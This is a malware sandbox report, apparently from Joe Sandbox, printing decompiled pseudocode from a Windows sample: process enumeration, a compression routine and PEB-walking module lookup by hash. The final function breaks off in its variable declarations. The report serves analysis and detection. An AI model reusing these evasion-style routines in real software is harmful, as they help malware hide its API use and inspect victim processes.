                  • Opcode Fuzzy Hash: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction Fuzzy Hash: 20023171601B108FC776CF29C680523BBF5BF55B227604A2EC6E796E91D23AF941CB08
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00401943, Relevance: 6.0, APIs: 4, Instructions: 37processCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00401943(void* __edx) {
				void* _v560;
				void* _t5;
				struct tagPROCESSENTRY32W* _t6;
				void* _t12;
				void* _t13;

				_t12 = __edx;
				_t5 = CreateToolhelp32Snapshot(2, 0);
				_t13 = _t5;
				if(_t13 != 0xffffffff) {
					_t6 =  &_v560;
					_v560 = 0x22c;
					Process32FirstW(_t13, _t6);
					while(_t6 != 0 && E00402255( &_v560, _t12) != 0) {
						_t6 = Process32NextW(_t13,  &_v560);
					}
					return CloseHandle(_t13);
				}
				return _t5;
			}








                  0x00401952
                  0x00401954
                  0x0040195a
                  0x0040195f
                  0x00401961
                  0x00401967
                  0x00401973
                  0x00401989
                  0x00401983
                  0x00401983
                  0x00000000
                  0x0040199f
                  0x004019aa

                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401954
                  • Process32FirstW.KERNEL32(00000000,?), ref: 00401973
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00401983
                  • CloseHandle.KERNEL32(00000000), ref: 0040199F
                    • Part of subcall function 00402255: GetCurrentProcessId.KERNEL32(0040C6D4,00000000,?,?,0040199A,0000022C,0040C6D4), ref: 00402273
                    • Part of subcall function 00402255: GetCurrentProcessId.KERNEL32(?,0040199A,0000022C,0040C6D4), ref: 00402284
                    • Part of subcall function 00402255: lstrcpyW.KERNEL32(00000004,0000022C), ref: 004022B6
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentProcessProcess32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                  • String ID:
                  • API String ID: 210870473-0
                  • Opcode ID: 32a748f4d19bd9fcb3bffcca5a552f4bc6dc848702525874167d515a2f84efd4
                  • Instruction ID: 16848b0ed7bca5f6eaa718ca54d67b5e4b9d7aaec9667f6a8c5e1db911b667c7
                  • Opcode Fuzzy Hash: 32a748f4d19bd9fcb3bffcca5a552f4bc6dc848702525874167d515a2f84efd4
                  • Instruction Fuzzy Hash: 93F096715011287AD720AB79AC0CFEF7B7CDB49711F1081B2ED05F21D0D7388A058A99
                  Uniqueness

                  Uniqueness Score: 0.04%

                  Function 0040436D, Relevance: .3, Instructions: 303COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040436D(intOrPtr* __ecx) {
				char _v5;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _t155;
				signed int _t161;
				void* _t167;
				signed int _t178;
				void* _t189;
				signed int _t192;
				signed int _t203;
				signed char _t213;
				signed int _t217;
				signed char _t219;
				signed int _t220;
				intOrPtr _t224;
				intOrPtr _t226;
				signed int _t228;
				signed int _t231;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t240;
				intOrPtr _t243;
				intOrPtr _t244;
				signed int _t250;
				intOrPtr* _t253;
				intOrPtr* _t257;
				intOrPtr _t258;
				signed int _t260;
				signed int _t264;
				signed int _t267;
				intOrPtr* _t274;
				intOrPtr _t275;
				void* _t276;
				signed int _t277;
				signed int _t279;
				signed int _t281;
				void* _t283;

				_t274 = __ecx;
				_t257 =  *((intOrPtr*)(__ecx + 0x84));
				_t275 =  *((intOrPtr*)(__ecx + 0x88));
				_t155 =  *((intOrPtr*)(__ecx + 0x80));
				_v16 = _t257;
				_v12 = _t275;
				_v24 = _t155;
				L2:
				while(_t275 != 0 || _t155 != 0 &&  *((intOrPtr*)(_t274 + 0x20)) != _t275) {
					_t224 =  *((intOrPtr*)(_t274 + 0x20));
					if( *((intOrPtr*)(_t274 + 0x24)) + _t224 < 2) {
						while(_t275 != 0) {
							if( *((intOrPtr*)(_t274 + 0x20)) >= 0x102) {
								L12:
								_t258 =  *((intOrPtr*)(_t274 + 0x20));
								_t226 =  <  ? 0x8000 - _t258 :  *((intOrPtr*)(_t274 + 0x24));
								 *((intOrPtr*)(_t274 + 0x24)) = _t226;
								if(_v24 != 0 || _t258 >= 0x102) {
									_t217 = 0;
									_t276 = 2;
									_t277 =  !=  ?  *(_t274 + 0x50) : _t276;
									_t161 =  *(_t274 + 0x1c) & 0x00007fff;
									_v28 = 1;
									_v32 = 0;
									_v36 = _t277;
									_v20 = _t161;
									if(( *(_t274 + 8) & 0x00090000) == 0) {
										E00403C52( &_v32, _t274,  *(_t274 + 0x1c), _t226, _t258,  &_v32,  &_v36);
										_t217 = _v32;
										_t283 = _t283 + 0x10;
										_t277 = _v36;
										_t228 = _v20;
										L32:
										if(_t277 != 3 || _t217 < 0x2000) {
											L34:
											if(_t228 == _t217 || ( *(_t274 + 8) & 0x00020000) != 0 && _t277 <= 5) {
												goto L37;
											} else {
												goto L38;
											}
										} else {
											L37:
											_t277 = 0;
											_t217 = 0;
											L38:
											_t260 =  *(_t274 + 0x50);
											if(_t260 == 0) {
												if(_t217 != 0) {
													if( *((intOrPtr*)(_t274 + 0x14)) != 0 || ( *(_t274 + 8) & 0x00010000) != 0 || _t277 >= 0x80) {
														E004042D4(_t274, _t277, _t217);
														L53:
														_t231 = _t277;
														goto L54;
													} else {
														_t178 =  <  ? _t228 : 0x8100;
														L51:
														 *(_t274 + 0x54) =  *(_t178 + _t274 + 0x90) & 0x000000ff;
														 *((intOrPtr*)(_t274 + 0x4c)) = _t217;
														 *(_t274 + 0x50) = _t277;
														L46:
														_t231 = _v28;
														L54:
														 *(_t274 + 0x1c) =  *(_t274 + 0x1c) + _t231;
														 *((intOrPtr*)(_t274 + 0x20)) =  *((intOrPtr*)(_t274 + 0x20)) - _t231;
														_t167 =  *((intOrPtr*)(_t274 + 0x24)) + _t231;
														_t233 =  <  ? _t167 : 0x8000;
														 *((intOrPtr*)(_t274 + 0x24)) =  <  ? _t167 : 0x8000;
														_t234 =  *((intOrPtr*)(_t274 + 0x28));
														if(_t234 > _t274 + 0x1926a) {
															L58:
															_t275 = _v12;
															 *((intOrPtr*)(_t274 + 0x84)) = _v16;
															 *((intOrPtr*)(_t274 + 0x88)) = _t275;
															_t236 = E004037A9(_t274, 0);
															if(_t236 != 0) {
																return 0 | _t236 > 0x00000000;
															}
															_t155 = _v24;
															L1:
															_t257 = _v16;
															goto L2;
														}
														_t275 = _v12;
														_t155 = _v24;
														if( *((intOrPtr*)(_t274 + 0x3c)) <= 0x7c00) {
															goto L1;
														}
														if((_t234 - _t274 - 0x9272) * 0x73 >> 7 >=  *((intOrPtr*)(_t274 + 0x3c))) {
															goto L58;
														}
														_t155 = _v24;
														if(( *(_t274 + 8) & 0x00080000) == 0) {
															goto L1;
														}
														goto L58;
													}
												}
												_t181 =  <  ? _t228 : 0x8100;
												E004042A2(_t274,  *((intOrPtr*)(( <  ? _t228 : 0x8100) + _t274 + 0x90)));
												goto L46;
											}
											_t240 = _t274;
											if(_t277 <= _t260) {
												E004042D4(_t240, _t260,  *((intOrPtr*)(_t274 + 0x4c)));
												_t231 =  *(_t274 + 0x50) - 1;
												 *(_t274 + 0x50) =  *(_t274 + 0x50) & 0x00000000;
												goto L54;
											}
											E004042A2(_t240,  *(_t274 + 0x54));
											if(_t277 < 0x80) {
												_t178 = _v20;
												goto L51;
											}
											E004042D4(_t240, _t277, _t217);
											 *(_t274 + 0x50) =  *(_t274 + 0x50) & 0x00000000;
											goto L53;
										}
									}
									_t228 = _t161;
									if(_t226 != 0 && ( *(_t274 + 8) & 0x00080000) == 0) {
										_t277 = 0;
										_v5 =  *((intOrPtr*)((_t228 - 0x00000001 & 0x00007fff) + _t274 + 0x90));
										if(_t258 == 0) {
											L30:
											_t277 = 0;
											goto L34;
										}
										_t189 = _t228 + _t274;
										_t243 = _v5;
										while( *((intOrPtr*)(_t189 + _t277 + 0x90)) == _t243) {
											_t277 = _t277 + 1;
											if(_t277 < _t258) {
												continue;
											}
											break;
										}
										_t228 = _v20;
										if(_t277 < 3) {
											goto L30;
										}
										_t217 = 1;
									}
									goto L32;
								} else {
									_t257 = _v16;
									goto L61;
								}
							}
							_t219 =  *_t257;
							_t192 =  *(_t274 + 0x1c) +  *((intOrPtr*)(_t274 + 0x20)) & 0x00007fff;
							_t257 = _t257 + 1;
							_t275 = _t275 - 1;
							_v16 = _t257;
							_v12 = _t275;
							 *(_t192 + _t274 + 0x90) = _t219;
							if(_t192 < 0x101) {
								 *(_t192 + _t274 + 0x8090) = _t219;
							}
							 *((intOrPtr*)(_t274 + 0x20)) =  *((intOrPtr*)(_t274 + 0x20)) + 1;
							_t244 =  *((intOrPtr*)(_t274 + 0x20));
							if( *((intOrPtr*)(_t274 + 0x24)) + _t244 >= 3) {
								_t279 =  *(_t274 + 0x1c) + _t244 + 0xfffffffd;
								_t264 = _t279 & 0x00007fff;
								_t250 = (( *(_t264 + _t274 + 0x90) & 0x000000ff) << 0x0000000a ^ _t219 & 0x000000ff) & 0x00007fff ^ ( *((_t279 + 0x00000001 & 0x00007fff) + _t274 + 0x90) & 0xff) << 0x00000005;
								 *((short*)(_t274 + 0x19272 + _t264 * 2)) =  *(_t274 + 0x29272 + _t250 * 2);
								_t257 = _v16;
								 *(_t274 + 0x29272 + _t250 * 2) = _t279;
								_t275 = _v12;
							}
						}
						goto L12;
					}
					_t203 =  *(_t274 + 0x1c) + _t224;
					_t281 = _t203 & 0x00007fff;
					_t220 = _t203 - 2;
					_t267 = ( *((_t220 & 0x00007fff) + _t274 + 0x90) & 0x000000ff) << 0x00000005 ^  *((_t220 + 0x00000001 & 0x00007fff) + _t274 + 0x90) & 0x000000ff;
					_t211 =  <  ? _v12 : 0x102 - _t224;
					_v12 = _v12 - 0x102;
					_t212 = ( <  ? _v12 : 0x102 - _t224) +  *((intOrPtr*)(_t274 + 0x20));
					_v28 = _v16 + 0x102;
					 *((intOrPtr*)(_t274 + 0x20)) = ( <  ? _v12 : 0x102 - _t224) +  *((intOrPtr*)(_t274 + 0x20));
					while(1) {
						_t253 = _v16;
						if(_t253 == _v28) {
							break;
						}
						_t213 =  *_t253;
						_v16 = _t253 + 1;
						 *(_t274 + _t281 + 0x90) = _t213;
						if(_t281 < 0x101) {
							 *(_t281 + _t274 + 0x8090) = _t213;
						}
						_t267 = (_t267 << 0x00000005 ^ _t213 & 0x000000ff) & 0x00007fff;
						_t281 = _t281 + 0x00000001 & 0x00007fff;
						 *((short*)(_t274 + 0x19272 + (_t220 & 0x00007fff) * 2)) =  *(_t274 + 0x29272 + _t267 * 2);
						 *(_t274 + 0x29272 + _t267 * 2) = _t220;
						_t220 = _t220 + 1;
					}
					_t275 = _v12;
					goto L12;
				}
				L61:
				 *((intOrPtr*)(_t274 + 0x84)) = _t257;
				 *((intOrPtr*)(_t274 + 0x88)) = _t275;
				return 1;
			}













































                  0x00404376
                  0x00404378
                  0x0040437e
                  0x00404384
                  0x0040438a
                  0x0040438d
                  0x00404390
                  0x00000000
                  0x00404398
                  0x004043b0
                  0x004043b8
                  0x004045c5
                  0x00404527
                  0x0040446d
                  0x0040446d
                  0x0040447c
                  0x00404483
                  0x00404486
                  0x00404497
                  0x0040449e
                  0x0040449f
                  0x004044a3
                  0x004044af
                  0x004044b6
                  0x004044b9
                  0x004044bc
                  0x004044bf
                  0x004045e5
                  0x004045ea
                  0x004045ed
                  0x004045f0
                  0x004045f3
                  0x004045f6
                  0x004045f9
                  0x00404603
                  0x00404605
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404615
                  0x00404615
                  0x00404615
                  0x00404617
                  0x00404619
                  0x00404619
                  0x0040461e
                  0x0040465e
                  0x00404683
                  0x004046ba
                  0x004046bf
                  0x004046c0
                  0x00000000
                  0x00404696
                  0x0040469f
                  0x004046a2
                  0x004046aa
                  0x004046ad
                  0x004046b0
                  0x0040467a
                  0x0040467a
                  0x004046c2
                  0x004046c2
                  0x004046ca
                  0x004046d0
                  0x004046d6
                  0x004046df
                  0x004046e2
                  0x004046e7
                  0x0040471f
                  0x00404724
                  0x00404729
                  0x0040472f
                  0x0040473a
                  0x0040473e
                  0x00000000
                  0x00404760
                  0x00404740
                  0x00404395
                  0x00404395
                  0x00000000
                  0x00404395
                  0x004046f0
                  0x004046f3
                  0x004046f6
                  0x00000000
                  0x00000000
                  0x0040470d
                  0x00000000
                  0x00000000
                  0x00404716
                  0x00404719
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404719
                  0x00404683
                  0x00404669
                  0x00404675
                  0x00000000
                  0x00404675
                  0x00404620
                  0x00404624
                  0x0040464c
                  0x00404655
                  0x00404656
                  0x00000000
                  0x00404656
                  0x00404629
                  0x00404634
                  0x00404644
                  0x00000000
                  0x00404644
                  0x00404639
                  0x0040463e
                  0x00000000
                  0x0040463e
                  0x004045f9
                  0x004044c7
                  0x004044c9
                  0x004044df
                  0x004044ed
                  0x004044f2
                  0x004045d2
                  0x004045d2
                  0x00000000
                  0x004045d2
                  0x004044f8
                  0x004044fb
                  0x004044fe
                  0x00404507
                  0x0040450a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040450a
                  0x0040450c
                  0x00404512
                  0x00000000
                  0x00000000
                  0x0040451a
                  0x0040451a
                  0x00000000
                  0x00404748
                  0x00404748
                  0x00000000
                  0x00404748
                  0x00404486
                  0x00404533
                  0x00404535
                  0x0040453a
                  0x0040453b
                  0x0040453c
                  0x0040453f
                  0x00404542
                  0x0040454e
                  0x00404550
                  0x00404550
                  0x00404557
                  0x0040455d
                  0x00404565
                  0x0040456d
                  0x00404574
                  0x004045a5
                  0x004045af
                  0x004045b7
                  0x004045ba
                  0x004045c2
                  0x004045c2
                  0x00404565
                  0x00000000
                  0x004045cd
                  0x004043c1
                  0x004043c5
                  0x004043cb
                  0x004043f0
                  0x004043ff
                  0x00404403
                  0x00404408
                  0x0040440b
                  0x0040440e
                  0x00404462
                  0x00404462
                  0x00404468
                  0x00000000
                  0x00000000
                  0x00404413
                  0x00404416
                  0x00404419
                  0x00404426
                  0x00404428
                  0x00404428
                  0x0040443e
                  0x00404443
                  0x00404451
                  0x00404459
                  0x00404461
                  0x00404461
                  0x0040446a
                  0x00000000
                  0x0040446a
                  0x0040474b
                  0x0040474d
                  0x00404753
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ae03f3a372626642b1fb26106d35d9b0dbeac125857d4feb9d457580f34e28b3
                  • Instruction ID: e33084252fcec48e949ebcca89b2b69e4ca8ec5097f1102ae8c543975fbc8947
                  • Opcode Fuzzy Hash: ae03f3a372626642b1fb26106d35d9b0dbeac125857d4feb9d457580f34e28b3
                  • Instruction Fuzzy Hash: 4FC1C271B04916ABCB18CE68C4907BAF7F1BF89304F04427ED659A7781D73CA855CB88
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 004012CD, Relevance: .0, Instructions: 23COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004012CD(void* __ecx) {
				void* _t8;
				intOrPtr* _t12;
				intOrPtr* _t13;

				_t8 = __ecx;
				_t12 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
				_t13 =  *_t12;
				while(_t13 != _t12) {
					if(E00401161( *((intOrPtr*)(_t13 + 0x30))) == _t8) {
						return  *((intOrPtr*)(_t13 + 0x18));
					}
					_t13 =  *_t13;
				}
				return 0;
			}






                  0x004012d9
                  0x004012db
                  0x004012de
                  0x004012f0
                  0x004012ec
                  0x00000000
                  0x004012fa
                  0x004012ee
                  0x004012ee
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c4bdfc313c746a2cb64b2d13bd71f69938b88e51a1103363138794cfe1d3b908
                  • Instruction ID: 7ecbe99e9aff7bbd4a6860067150bf6fe1a6c3b143e7c3a6fabfcc45b8fe1074
                  • Opcode Fuzzy Hash: c4bdfc313c746a2cb64b2d13bd71f69938b88e51a1103363138794cfe1d3b908
                  • Instruction Fuzzy Hash: EFE086333104508BC720DA99C480857F3F9EB84370B2908BFE546F7A61C338BC019688
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00401E04, Relevance: .0, Instructions: 3COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00401E04() {

				return  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
			}



                  0x00401e10

                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
                  • Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 004076C6, Relevance: 39.0, APIs: 1, Strings: 21, Instructions: 495libraryUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 83%
                  			E004076C6(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				intOrPtr _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				intOrPtr _v788;
				intOrPtr _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				intOrPtr _v868;
				intOrPtr _v872;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr _v900;
				intOrPtr _v904;
				intOrPtr _v908;
				intOrPtr _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				intOrPtr _v924;
				intOrPtr _v928;
				intOrPtr _v932;
				intOrPtr _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				intOrPtr _v956;
				intOrPtr _v960;
				intOrPtr _v964;
				intOrPtr _v968;
				intOrPtr _v972;
				intOrPtr _v976;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				intOrPtr _v992;
				intOrPtr _v996;
				intOrPtr _v1000;
				intOrPtr _v1004;
				intOrPtr _v1008;
				intOrPtr _v1012;
				intOrPtr _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				intOrPtr _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				intOrPtr _v1060;
				intOrPtr _v1064;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
				intOrPtr _v1148;
				intOrPtr _v1152;
				intOrPtr _v1156;
				intOrPtr _v1160;
				intOrPtr _v1164;
				intOrPtr _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				intOrPtr _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				intOrPtr _v1196;
				intOrPtr _v1200;
				intOrPtr _v1204;
				intOrPtr _v1208;
				intOrPtr _v1212;
				intOrPtr _v1216;
				intOrPtr _v1220;
				intOrPtr _v1224;
				intOrPtr _v1228;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr _v1248;
				intOrPtr _v1252;
				intOrPtr _v1256;
				intOrPtr _v1260;
				intOrPtr _v1264;
				intOrPtr _v1268;
				intOrPtr _v1272;
				intOrPtr _v1276;
				intOrPtr _v1280;
				intOrPtr _v1284;
				intOrPtr _v1288;
				intOrPtr _v1292;
				intOrPtr _v1296;
				intOrPtr _v1300;
				intOrPtr _v1304;
				intOrPtr _v1308;
				intOrPtr _v1312;
				intOrPtr _v1316;
				intOrPtr _v1320;
				intOrPtr _v1324;
				intOrPtr _v1328;
				intOrPtr _v1332;
				intOrPtr _v1336;
				intOrPtr _v1340;
				intOrPtr _v1344;
				intOrPtr _v1348;
				intOrPtr _v1352;
				intOrPtr _v1356;
				intOrPtr _v1360;
				intOrPtr _v1364;
				intOrPtr _v1368;
				intOrPtr _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				intOrPtr _v1384;
				intOrPtr _v1388;
				intOrPtr _v1392;
				intOrPtr _v1396;
				intOrPtr _v1400;
				intOrPtr _v1404;
				intOrPtr _v1408;
				intOrPtr _v1412;
				intOrPtr _v1416;
				intOrPtr _v1420;
				intOrPtr _v1424;
				intOrPtr _v1428;
				intOrPtr _v1432;
				intOrPtr _v1436;
				intOrPtr _v1440;
				intOrPtr _v1444;
				intOrPtr _v1448;
				intOrPtr _v1452;
				intOrPtr _v1456;
				intOrPtr _v1460;
				intOrPtr _v1464;
				intOrPtr _v1468;
				intOrPtr _v1472;
				intOrPtr _v1476;
				intOrPtr _v1480;
				intOrPtr _v1484;
				intOrPtr _v1488;
				intOrPtr _v1492;
				intOrPtr _v1496;
				intOrPtr _v1500;
				intOrPtr _v1504;
				intOrPtr _v1508;
				intOrPtr _v1512;
				intOrPtr _v1516;
				intOrPtr _v1520;
				intOrPtr _v1524;
				intOrPtr _v1528;
				intOrPtr _v1532;
				intOrPtr _v1536;
				intOrPtr _v1540;
				intOrPtr _v1544;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				intOrPtr _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				intOrPtr _v1676;
				intOrPtr _v1680;
				intOrPtr _v1684;
				intOrPtr _v1688;
				intOrPtr _v1692;
				intOrPtr _v1696;
				intOrPtr _v1700;
				intOrPtr _v1704;
				intOrPtr _v1708;
				intOrPtr _v1712;
				intOrPtr _v1716;
				intOrPtr _v1720;
				intOrPtr _v1724;
				intOrPtr _v1728;
				intOrPtr _v1732;
				intOrPtr _v1736;
				intOrPtr _v1740;
				intOrPtr _v1744;
				intOrPtr _v1748;
				intOrPtr _v1752;
				intOrPtr _v1756;
				intOrPtr _v1760;
				intOrPtr _v1764;
				intOrPtr _v1768;
				intOrPtr _v1772;
				intOrPtr _v1776;
				intOrPtr _v1780;
				intOrPtr _v1784;
				intOrPtr _v1788;
				intOrPtr _v1792;
				intOrPtr _v1796;
				intOrPtr _v1800;
				intOrPtr _v1804;
